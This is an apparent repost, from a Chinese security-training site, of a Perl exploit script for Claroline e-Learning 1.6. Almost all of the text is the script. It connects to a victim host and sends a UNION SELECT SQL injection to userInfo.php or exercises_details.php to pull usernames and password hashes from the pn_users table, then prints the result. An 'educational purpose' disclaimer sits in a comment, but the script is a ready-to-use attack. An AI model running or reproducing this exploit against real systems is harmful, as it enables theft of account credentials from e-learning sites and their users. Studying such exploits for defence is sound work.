Claroline e-Learning = 1.6 Remote Hash SQL Injection Perl Exploit

来源：hackervip(黑客/网络安全) | 本站提供：安全培训/网络安全培训 |

[ 文字： 变小 变大 ] #!/usr/bin/perl # Claroline E-Learning Application Remote SQL Exploit # [K-C0d3r] # This tools and to consider only himself to educational purpose # Bug discovered by # Greetz to mZ, 2b TUBE, off, rikky, str0ke, x0n3-h4ck, MWC # [K-C0d3r] use IO::Socket; sub Usage { print STDERR "Usage: KCcol-xpl.pl <[url]www.victim.com>[/url] <path/dir> <target_num>\n"; print STDERR "Targets:\n1 - userInfo.php\n"; print STDERR "2 - exercises_details.php\n"; exit; } if (@ARGV < 3) {  Usage(); } if (@ARGV > 3) {  Usage(); } if (@ARGV == 3) { $host = @ARGV[0]; $path = @ARGV[1]; $target = @ARGV[2]; print "[K-C0d3r]  Claroline E-Learning Application Remote SQL Exploit [K-C0d3r]\n"; print "[+] Connecting to $host\n"; $sqli = "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null"; $sqli .= "%20FROM%20pn_users%20WHERE%20pn_uid=2/*"; $socket = new IO::Socket::INET (PeerAddr => "$host",                                 PeerPort => 80,                                 Proto => ‘tcp‘);                                 die unless $socket; print "[+] Injecting command ...\n"; if ($target == 1) { print $socket "GET [url]http://$host/$path/userInfo.php?uInfo=-1$sqli[/url] HTTP/1.1\nHost: $host\n\n Connection: Close\r\n\r\n"; while (<$socket>) {  print $_;  exit; } } if ($target == 2) { print $socket "GET [url]http://$host/$path/exercises_details.php?uInfo=-1$sqli[/url] HTTP/1.1\nHost: $host\n\n Connection: Close\r\n\r\n"; while (<$socket>) {  print $_;  exit; } } }